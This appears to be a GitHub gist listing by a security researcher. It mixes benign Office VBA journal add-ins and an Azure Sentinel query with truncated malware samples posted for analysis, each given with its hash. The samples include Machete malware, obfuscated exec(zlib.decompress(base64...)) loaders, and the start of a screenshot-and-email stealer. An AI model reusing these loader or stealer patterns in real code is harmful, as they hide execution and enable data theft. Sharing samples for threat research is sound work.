John Lambert JohnLaTwC

  • Microsoft Corporation
@JohnLaTwC
JohnLaTwC / VBAStomped.txt
Created February 7, 2020 03:01
List of hashes of VBAStomped files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## Uploaded by @JohnLaTwC
## sample hash 7257da9496e127b899ce8bc6f72bff7a4ac478060ae1283f35eb1a20a5d977de
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Calculate_Bonus()
'
' Calculate_Bonus Macro
'
' Calculate USAA Bounus
'
Dim fs As Object
@JohnLaTwC
JohnLaTwC / Journal
Created January 4, 2020 01:35
Journal addin for PowerPoint
' Author: @JohnLaTwC
' You can recreate the Journal feature for PPT files with the following steps. This will create a journal entry every time you open a PPT file.
' STEPS:
' Create a presentation. Insert a Class named clsEvent with the following code:
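' Application-level event sink. Declaring the reference WithEvents lets this
' class receive PowerPoint Application events once PPTEvent has been assigned.
Public WithEvents PPTEvent As Application

' Runs after a presentation has been opened and passes its name to
' RecordJournalEntry. That routine is not defined in this class and must be
' available elsewhere in the project.
Private Sub PPTEvent_AfterPresentationOpen(ByVal Pres As Presentation)
    ' Use the presentation handed to the event rather than ActivePresentation,
    ' which is not guaranteed to be the one that was just opened (for example
    ' when a file is opened without a window).
    RecordJournalEntry Pres.Name
End Sub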
@JohnLaTwC
JohnLaTwC / Add to Normal.dot
Created January 3, 2020 21:42
Add Word doc to Journal
' Inspired from https://www.slipstick.com/outlook/journal/create-journal-entry-word-documents-outlook-2013/
' and https://www.msoutlook.info/question/432
' By: @JohnLaTwC (1/3/2020)
Sub RecordJournalEntry(fName)
Const olJournalItem = 4
Dim ol
Set ol = CreateObject("Outlook.Application")
Dim oJournal
Set oJournal = ol.CreateItem(olJournalItem)
@JohnLaTwC
JohnLaTwC / add to normal.dot
Created January 3, 2020 21:27
Word Add to Journal feature
' Inspired from https://www.slipstick.com/outlook/journal/create-journal-entry-word-documents-outlook-2013/
' By: @JohnLaTwC (1/3/2020)
Sub RecordJournalEntry(fName)
Const olJournalItem = 4
Const olByReference = 4
Dim ol
Set ol = CreateObject("Outlook.Application")
Dim oJournal
Set oJournal = ol.CreateItem(olJournalItem)
## Sample hash: aaab2536650f72314d9670e1fa75dad6f54ed0cbeb8c0182009c8cdb31cb3d97
## link: https://www.virustotal.com/gui/file/aaab2536650f72314d9670e1fa75dad6f54ed0cbeb8c0182009c8cdb31cb3d97/detection
## uploaded by @JohnLaTwC
## Embedded file name: Chrome.py
try:
import subprocess
from encodings import hex_codec
import re, urllib2, os
@JohnLaTwC
JohnLaTwC / LoginsInRedmond.csl
Created December 17, 2019 04:00
Azure Sentinel Geospatial query
SigninLogs
| where TimeGenerated >= ago(1d)
| where ResultType == 0
| extend longitude = todouble(LocationDetails['geoCoordinates']['longitude']),
latitude = todouble(LocationDetails['geoCoordinates']['latitude'])
| where geo_point_in_polygon(longitude, latitude,
dynamic({"type":"Polygon","coordinates": [[
[ -122.164216, 47.711740],
[ -122.084565, 47.714050],
[ -122.077698, 47.627585],
##############################
## uploaded by @JohnLaTwc
## sample hash (SHA-256): b454179c13cb4727ae06cc9cd126c3379e2aded5c293af0234ac3312bf9bdad2
import zlib, base64
exec(zlib.decompress(base64.b64decode('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
@JohnLaTwC
JohnLaTwC / Machete malware
Created December 16, 2019 22:24
Machete malware
## uploaded by @JohnLaTwc
## See paper by ESET @ https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf
## sample hash (SHA-256): b67256906d976aafb6071d23d1b3f59a1696f26b25ff4713b9342d41e656dfba
import zlib, base64
exec(zlib.decompress(base64.b64decode('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
## uploaded by @JohnLaTwC
## passwords removed. original sample: https://www.virustotal.com/gui/file/79115bb09fb8f17d9182d8b5f6f7a617ad3cd3d5eafb75b652a71d987cbb783e/details
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import urllib
from mss import mss
import smtplib
import datetime